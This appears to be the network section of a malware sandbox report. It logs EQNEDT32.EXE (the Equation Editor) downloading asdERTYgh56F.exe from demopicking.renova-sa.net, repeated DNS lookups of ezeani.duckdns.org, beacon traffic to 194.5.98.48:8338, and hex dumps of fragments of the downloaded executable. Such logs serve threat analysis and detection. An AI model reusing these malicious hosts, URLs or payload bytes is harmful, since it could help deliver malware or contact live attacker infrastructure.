Oct 13, 2021 10:01:01.014106989 CEST	49181	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:01:01.057224035 CEST	8338	49181	194.5.98.48	192.168.2.22
Oct 13, 2021 10:01:01.574038029 CEST	49181	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:01:01.617172956 CEST	8338	49181	194.5.98.48	192.168.2.22
Oct 13, 2021 10:01:02.120057106 CEST	49181	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:01:02.165273905 CEST	8338	49181	194.5.98.48	192.168.2.22
Oct 13, 2021 10:01:06.161312103 CEST	49182	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:01:06.206163883 CEST	8338	49182	194.5.98.48	192.168.2.22
Oct 13, 2021 10:01:06.706801891 CEST	49182	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:01:06.750051022 CEST	8338	49182	194.5.98.48	192.168.2.22
Oct 13, 2021 10:01:07.268661022 CEST	49182	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:01:07.311810017 CEST	8338	49182	194.5.98.48	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 09:59:21.185333967 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:21.293992043 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:47.240828991 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:47.354701996 CEST	53	50591	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:47.355910063 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:47.374175072 CEST	53	50591	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:52.772918940 CEST	57805	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:52.887907028 CEST	53	57805	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:58.129411936 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:58.147654057 CEST	53	59030	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:58.148163080 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:58.166407108 CEST	53	59030	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:18.795478106 CEST	59185	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:18.814081907 CEST	53	59185	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:24.019435883 CEST	55616	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:24.135766983 CEST	53	55616	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:24.136451960 CEST	55616	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:24.155626059 CEST	53	55616	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:29.338015079 CEST	49972	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:29.356427908 CEST	53	49972	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:49.979460001 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.093735933 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.094465017 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.207654953 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.208348036 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.323592901 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.324213982 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.342456102 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.343091965 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.361336946 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:55.547637939 CEST	59867	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:55.566097975 CEST	53	59867	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.741380930 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:00.854655981 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.862250090 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:00.880428076 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.880924940 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:00.994245052 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.994884014 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:01.012785912 CEST	53	50315	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 09:59:21.185333967 CEST	192.168.2.22	8.8.8.8	0x19fc	Standard query (0)	demopicking.renova-sa.net	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.240828991 CEST	192.168.2.22	8.8.8.8	0x6e3a	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.355910063 CEST	192.168.2.22	8.8.8.8	0x6e3a	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:52.772918940 CEST	192.168.2.22	8.8.8.8	0x5435	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.129411936 CEST	192.168.2.22	8.8.8.8	0xfefa	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.148163080 CEST	192.168.2.22	8.8.8.8	0xfefa	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:18.795478106 CEST	192.168.2.22	8.8.8.8	0xc8ce	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.019435883 CEST	192.168.2.22	8.8.8.8	0x360f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.136451960 CEST	192.168.2.22	8.8.8.8	0x360f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:29.338015079 CEST	192.168.2.22	8.8.8.8	0x7497	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:49.979460001 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.094465017 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.208348036 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.324213982 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.343091965 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:55.547637939 CEST	192.168.2.22	8.8.8.8	0x473f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.741380930 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.862250090 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.880924940 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.994884014 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 13, 2021 09:59:21.293992043 CEST	8.8.8.8	192.168.2.22	0x19fc	No error (0)	demopicking.renova-sa.net	97.107.138.110	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.354701996 CEST	8.8.8.8	192.168.2.22	0x6e3a	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.374175072 CEST	8.8.8.8	192.168.2.22	0x6e3a	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:52.887907028 CEST	8.8.8.8	192.168.2.22	0x5435	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.147654057 CEST	8.8.8.8	192.168.2.22	0xfefa	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.166407108 CEST	8.8.8.8	192.168.2.22	0xfefa	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:18.814081907 CEST	8.8.8.8	192.168.2.22	0xc8ce	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.135766983 CEST	8.8.8.8	192.168.2.22	0x360f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.155626059 CEST	8.8.8.8	192.168.2.22	0x360f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:29.356427908 CEST	8.8.8.8	192.168.2.22	0x7497	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.093735933 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.207654953 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.323592901 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.342456102 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.361336946 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:55.566097975 CEST	8.8.8.8	192.168.2.22	0x473f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.854655981 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.880428076 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.994245052 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:01.012785912 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

demopicking.renova-sa.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	97.107.138.110	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49165	97.107.138.110	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 09:59:21.414997101 CEST	0	OUT	GET /asdERTYgh56F.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: demopicking.renova-sa.net Connection: Keep-Alive
Oct 13, 2021 09:59:21.515645027 CEST	1	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 07:59:20 GMT Server: Apache Location: https://demopicking.renova-sa.net/asdERTYgh56F.exe Content-Length: 258 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6d 6f 70 69 63 6b 69 6e 67 2e 72 65 6e 6f 76 61 2d 73 61 2e 6e 65 74 2f 61 73 64 45 52 54 59 67 68 35 36 46 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://demopicking.renova-sa.net/asdERTYgh56F.exe">here</a>.</p></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	97.107.138.110	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
2021-10-13 07:59:22 UTC	0	OUT	GET /asdERTYgh56F.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: demopicking.renova-sa.net
2021-10-13 07:59:22 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 07:59:21 GMT Server: Apache Last-Modified: Wed, 13 Oct 2021 01:25:21 GMT Accept-Ranges: bytes Content-Length: 1073384 Connection: close Content-Type: application/x-msdownload
2021-10-13 07:59:22 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 62 60 f7 f7 26 01 99 a4 26 01 99 a4 26 01 99 a4 92 9d 68 a4 2b 01 99 a4 92 9d 6a a4 ab 01 99 a4 92 9d 6b a4 3e 01 99 a4 b8 a1 5e a4 24 01 99 a4 1d 5f 9a a5 30 01 99 a4 1d 5f 9d a5 35 01 99 a4 1d 5f 9c a5 0a 01 99 a4 2f 79 1a a4 2c 01 99 a4 2f 79 0a a4 23 01 99 a4 26 01 98 a4 2c 00 99 a4 b1 5f 9c a5 17 01 99 a4 b1 5f 99 a5 27 01 99 a4 b4 5f 66 a4 27 01 99 a4 b1 5f 9b a5 27 01 99 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b`&&&h+jk>^$_0_5_/y,/y#&,__'_f'_'
2021-10-13 07:59:22 UTC	8	IN	Data Raw: 00 66 89 86 04 11 00 00 83 ff 02 74 0a 39 4e 24 7d 05 33 c0 40 eb 02 8b c1 88 86 f8 10 00 00 8b 46 08 c1 e8 08 24 01 88 86 f9 10 00 00 74 2c 8d 4d 24 e8 47 97 00 00 8d 4d 24 8b f8 e8 3d 97 00 00 83 7d 54 ff 8b d0 75 0c 83 fa ff 75 07 33 c0 40 33 c9 eb 11 33 c9 8b c1 eb 0b 83 7d 54 ff 8b d1 8b f9 0f 94 c0 88 86 9a 10 00 00 33 c0 03 46 14 89 86 58 10 00 00 13 f9 33 c0 03 45 54 89 be 5c 10 00 00 13 d1 89 86 60 10 00 00 80 be 9a 10 00 00 00 89 96 64 10 00 00 74 11 b8 ff ff ff 7f 89 86 60 10 00 00 89 86 64 10 00 00 8b 45 4c bf ff 1f 00 00 89 7d 54 3b c7 73 05 8b f8 89 45 54 57 8d 85 d0 df ff ff 50 8d 4d 24 e8 10 97 00 00 33 c0 83 7d 50 02 88 84 3d d0 df ff ff 75 76 33 c9 8d 7e 28 66 89 0f f7 46 08 00 02 00 00 74 3f 8d 4d 00 e8 c8 3d 00 00 8d 85 d0 df ff ff 50 Data Ascii: ft9N$}3@F$t,M$GM$=}Tuu3@33}T3FX3ET\`dt`dEL}T;sETWPM$3}P=uv3~(fFt?M=P
2021-10-13 07:59:22 UTC	16	IN	Data Raw: 66 0f 6e ca 66 0f ef c5 66 0f 62 ca 0f 28 e0 66 0f 72 d0 0c 66 0f 72 f4 14 66 0f ef e0 66 0f 6e 44 24 2c 66 0f 62 d8 0f 28 44 24 60 66 0f 62 d9 66 0f fe df 66 0f 6e f8 66 0f fe dc 66 0f ef c3 0f 29 5c 24 50 0f 28 d8 66 0f 72 d0 08 66 0f 72 f3 18 66 0f ef d8 0f 28 d3 66 0f 70 db 39 66 0f fe d6 0f 28 c2 66 0f ef c4 66 0f 70 e2 4e 0f 28 c8 66 0f 6e d2 66 0f 72 d0 07 66 0f 72 f1 19 66 0f ef c8 66 0f 6e 44 24 24 66 0f 62 f8 66 0f 70 e9 93 66 0f 6e 4c 24 18 66 0f 62 ca 66 0f 62 f9 66 0f fe 7c 24 50 66 0f 6e 4c 24 14 66 0f fe fd 66 0f ef df 66 0f 6e d7 0f 28 c3 66 0f 62 ca 66 0f 72 d0 10 66 0f 72 f3 10 66 0f ef c3 66 0f 6e 5c 24 2c 0f 28 f0 0f 29 44 24 60 66 0f fe f4 0f 28 c6 66 0f ef c5 0f 28 e0 66 0f 72 d0 0c 66 0f 72 f4 14 66 0f ef e0 66 0f 6e 44 24 20 66 0f Data Ascii: fnffb(frfrffnD$,fb(D$`fbffnff)\$P(frfrf(fp9f(ffpN(fnfrfrffnD$$fbfpfnL$fbfbf\|$PfnL$fffn(fbfrfrffn\$,()D$`f(f(frfrffnD$ f
2021-10-13 07:59:22 UTC	23	IN	Data Raw: 01 00 83 c6 04 83 c4 0c 83 fe 0c 72 90 6a 44 8d 45 bc 50 e8 9f 7f 00 00 53 8d 45 00 50 e8 95 7f 00 00 53 8d 45 20 50 e8 8b 7f 00 00 53 8d 45 9c 50 e8 81 7f 00 00 5f 5e 5b 8d 65 58 5d c2 20 00 33 c0 88 41 04 89 41 08 89 41 0c 89 41 10 8b c1 c3 83 ec 0c 53 8b 5c 24 1c 55 8b 6c 24 24 56 57 33 f6 89 4c 24 18 33 ff 85 ed 74 09 8a 03 46 88 44 24 12 eb 05 c6 44 24 12 00 8b 44 24 34 3b f5 0f 83 fb 00 00 00 8d 56 01 89 54 24 14 3b f8 0f 83 f0 00 00 00 83 79 08 00 75 1b 3b f5 0f 83 de 00 00 00 8a 04 1e 46 42 88 41 04 89 54 24 14 c7 41 08 08 00 00 00 0f b6 41 04 c1 e8 06 83 e8 00 0f 84 62 01 00 00 83 e8 01 0f 84 2c 01 00 00 83 e8 01 0f 84 f3 00 00 00 83 e8 01 0f 85 88 00 00 00 3b f5 0f 83 80 00 00 00 0f b6 1c 1e 46 42 89 54 24 14 84 db 0f 89 a1 00 00 00 3b f5 73 6a Data Ascii: rjDEPSEPSE PSEP_^[eX] 3AAAAS\$Ul$$VW3L$3tFD$D$D$4;VT$;yu;FBAT$AAb,;FBT$;sj
2021-10-13 07:59:22 UTC	31	IN	Data Raw: 84 8d 00 00 00 83 f8 05 0f 84 84 00 00 00 8a 4d 0f 8b 75 e8 84 c9 0f 84 fd 00 00 00 66 3b f2 0f 84 eb 00 00 00 8b 47 08 80 b8 f9 61 00 00 00 0f 85 db 00 00 00 33 c0 88 45 f1 8d 87 f6 10 00 00 50 e8 45 15 00 00 84 c0 74 35 80 7d f1 00 75 39 33 c9 8d 83 c0 32 00 00 51 50 ff b3 e4 32 00 00 8d 45 f1 ff b3 e0 32 00 00 50 68 00 08 00 00 8d 87 f6 10 00 00 50 51 ff 77 08 e8 3d 08 00 00 80 7d f1 00 0f 84 84 00 00 00 33 c0 8a c8 88 4d 0f eb 7e 8b cb e8 8c 96 ff ff 84 c0 74 50 80 7d 0f 00 0f 84 9e 00 00 00 8b 45 e8 66 83 f8 50 0f 84 91 00 00 00 6a 49 59 66 3b c1 0f 84 85 00 00 00 6a 45 59 66 3b c1 74 7d 8b 47 08 33 c9 41 39 88 58 61 00 00 74 6f ff 87 e4 00 00 00 8d 85 c4 ee ff ff 50 53 8b cf e8 d0 f3 ff ff eb 58 8a 4d 0f 84 c9 74 22 8d 85 a0 de ff ff 8b cf 50 53 e8 Data Ascii: Muf;Ga3EPEt5}u932QP2E2PhPQw=}3M~tP}EfPjIYf;jEYf;t}G3A9XatoPSXMt"PS
2021-10-13 07:59:22 UTC	39	IN	Data Raw: 02 75 11 ff 75 0c ff 75 08 ff 76 04 e8 4d b5 ff ff 89 46 04 83 3e 03 75 5c 83 7e 10 01 76 30 57 33 ff 39 7e 0c 75 27 68 38 03 00 00 e8 db 2f 01 00 59 89 45 f0 89 7d fc 85 c0 74 0b 6a 08 8b c8 e8 c1 5a 00 00 8b f8 83 4d fc ff 89 7e 0c 5f 8b 4e 08 8b 46 0c ff 75 0c ff 75 08 89 81 4c 0b 00 00 8b 4e 08 8b 46 10 89 81 50 0b 00 00 ff 76 08 e8 c4 af ff ff 8b 4d f4 5e 64 89 0d 00 00 00 00 8b e5 5d c2 08 00 8b c1 f7 d0 40 83 e0 3f 03 c1 89 81 f0 00 00 00 83 e8 80 89 81 f4 00 00 00 83 c0 20 89 81 f8 00 00 00 83 c0 08 89 81 fc 00 00 00 c3 53 56 ff 74 24 0c 8b f1 8d 8e 28 10 00 00 e8 f9 75 ff ff 33 db 8d 8e 70 10 00 00 53 88 5e 10 e8 98 fe ff ff 89 9e 40 10 00 00 89 9e 44 10 00 00 89 9e 50 10 00 00 89 9e 54 10 00 00 89 9e 48 10 00 00 89 9e 4c 10 00 00 89 9e 98 10 00 Data Ascii: uuuvMF>u\~v0W39~u'h8/YE}tjZM~_NFuuLNFPvM^d]@? SVt$(u3pS^@DPTHL
2021-10-13 07:59:22 UTC	47	IN	Data Raw: c4 0c 89 6e 04 8b 6c 24 20 e9 98 00 00 00 8b 4e 24 3b e9 7c 0c 7f 05 3b 5e 20 76 05 8b 6e 20 eb 02 8b eb 85 ed 74 7d 80 7e 4f 00 74 27 80 be cd 00 00 00 00 74 1e 33 ff 3b f9 7c 18 7f 05 3b 5e 20 76 11 03 c5 8b c8 83 e1 f0 2b c8 03 cd 85 c9 7e 02 8b e9 8b 02 8b ca ff 50 18 84 c0 0f 84 a6 00 00 00 8b 4e 2c 55 ff 74 24 14 8b 01 ff 50 0c 8b 6c 24 20 8b f8 8b 46 38 85 c0 75 06 8d 85 80 22 00 00 80 7e 2b 00 75 1d 80 b8 99 10 00 00 00 74 14 57 ff 74 24 14 8d 8e 90 00 00 00 e8 0e e0 ff ff eb 02 8b ea 8b 4c 24 14 8b c7 99 01 46 70 11 56 74 03 cf 01 7c 24 10 2b df 29 46 20 89 4c 24 14 19 56 24 80 7e 4f 00 74 43 8b 46 20 0b 46 24 75 3b 85 ff 74 0d 38 86 cd 00 00 00 74 2f f6 c1 0f 74 2a 0f b7 46 4c 50 6a 01 56 55 e8 7e b8 00 00 84 c0 74 0f 85 db 74 14 8b 44 24 14 33 Data Ascii: nl$ N$;\|;^ vn t}~Ot't3;\|;^ v+~PN,Ut$Pl$ F8u"~+utWt$L$FpVt\|$+)F L$V$~OtCF F$u;t8t/t*FLPjVU~ttD$3
2021-10-13 07:59:22 UTC	55	IN	Data Raw: d6 7d 2a 8d 44 24 18 8d 04 90 89 44 24 3c 83 ff 04 7d 1d 8b 00 8d 0c 9f 89 44 8d 18 42 8b 44 24 3c 83 c0 04 47 89 44 24 3c 3b d6 7c e1 83 ff 04 75 03 43 33 ff 3b d6 7c c1 3b 5d 04 8b 54 24 14 0f 8e b1 fe ff ff 5f 5e 5d 5b 83 c4 28 c2 04 00 56 8b f1 68 e4 22 43 00 c6 86 01 01 00 00 00 e8 08 02 00 00 8b c6 5e c3 56 8b f1 83 3e 00 74 08 ff 36 ff 15 88 20 43 00 33 c0 89 06 89 46 08 89 46 0c 5e c3 e9 6e 00 00 00 55 8b ec 81 ec 00 02 00 00 8d 85 00 ff ff ff 53 56 be 80 00 00 00 56 50 e8 64 00 00 00 8b 4d 08 8d 85 00 fe ff ff 56 50 e8 54 00 00 00 8d 85 00 fe ff ff 50 8d 85 00 ff ff ff 50 e8 00 44 01 00 59 8b d8 8d 85 00 ff ff ff 59 f7 db 56 1a db 50 fe c3 e8 d7 01 00 00 56 8d 85 00 fe ff ff 50 e8 ca 01 00 00 5e 8a c3 5b 8b e5 5d c2 04 00 68 00 01 00 00 51 c6 81 Data Ascii: }*D$D$<}DBD$<GD$<;\|uC3;\|;]T$_^][(Vh"C^V>t6 C3FF^nUSVVPdMVPTPPDYYVPVP^[]hQ
2021-10-13 07:59:22 UTC	63	IN	Data Raw: 74 04 32 c0 eb 45 56 8d b7 20 03 00 00 56 ff 15 cc 20 43 00 8b 97 10 03 00 00 8b 4c 24 0c 56 8b 84 d7 0c 01 00 00 89 01 8b 84 d7 10 01 00 00 89 41 04 8b 87 10 03 00 00 40 83 e0 3f 89 87 10 03 00 00 ff 15 d0 20 43 00 b0 01 5e 5f c2 04 00 8b 4c 24 04 e8 05 00 00 00 33 c0 c2 04 00 55 8b ec 51 51 56 8d 45 f8 8b f1 50 e8 7d ff ff ff 84 c0 74 40 57 8d be 20 03 00 00 ff 75 fc ff 55 f8 57 ff 15 cc 20 43 00 83 ae 08 01 00 00 01 75 0c ff b6 1c 03 00 00 ff 15 d8 20 43 00 57 ff 15 d0 20 43 00 8d 45 f8 8b ce 50 e8 3e ff ff ff 84 c0 75 c8 5f 5e 8b e5 5d c3 56 8b f1 83 be 08 01 00 00 00 74 2b ff b6 1c 03 00 00 ff 15 dc 20 43 00 6a 00 ff b6 08 01 00 00 ff b6 18 03 00 00 ff 15 e0 20 43 00 ff b6 1c 03 00 00 e8 ec fd ff ff 5e c3 8b 44 24 04 01 01 8b 44 24 08 11 41 04 c2 08 Data Ascii: t2EV V CL$VA@? C^_L$3UQQVEP}t@W uUW Cu CW CEP>u_^]Vt+ Cj C^D$D$A
2021-10-13 07:59:22 UTC	70	IN	Data Raw: 8b 54 24 04 8b 81 58 4c 00 00 81 c1 64 e6 00 00 52 89 42 1c e8 31 95 ff ff c2 04 00 55 56 8b 74 24 10 57 8b f9 0f b6 6c 3e 29 0f b6 44 3e 2a 3b e8 75 06 8b 44 24 10 eb 35 53 8d 46 01 50 e8 d4 f8 ff ff 8b d8 85 db 74 22 6b ce 0c 8b 74 24 14 51 56 53 e8 08 c5 00 00 8b 84 af b8 00 00 00 83 c4 0c 89 06 89 b4 af b8 00 00 00 8b c3 5b 5f 5e 5d c2 08 00 56 8b 74 24 08 8d 91 80 00 00 00 33 c0 3b 32 72 0d 40 83 c2 04 83 f8 20 72 f3 33 c0 eb 13 8b 84 81 80 00 00 00 2b c6 3b 44 24 0c 72 04 8b 44 24 0c 5e c2 08 00 56 8b f1 8b 4e 04 81 f9 e2 7f 00 00 7e 16 8b ce e8 44 1e 00 00 8b 4e 04 81 f9 00 80 00 00 7c 04 33 c0 5e c3 8b 46 10 0f b6 04 08 41 89 4e 04 5e c3 83 ec 0c 53 56 8b f1 33 db 57 8b 86 b0 00 00 00 3b 86 b4 00 00 00 74 02 88 18 8d 44 24 0c 8b fb 55 89 44 24 18 Data Ascii: T$XLdRB1UVt$Wl>)D>*;uD$5SFPt"kt$QVS[_^]Vt$3;2r@ r3+;D$rD$^VN~DN\|3^FAN^SV3W;tD$UD$
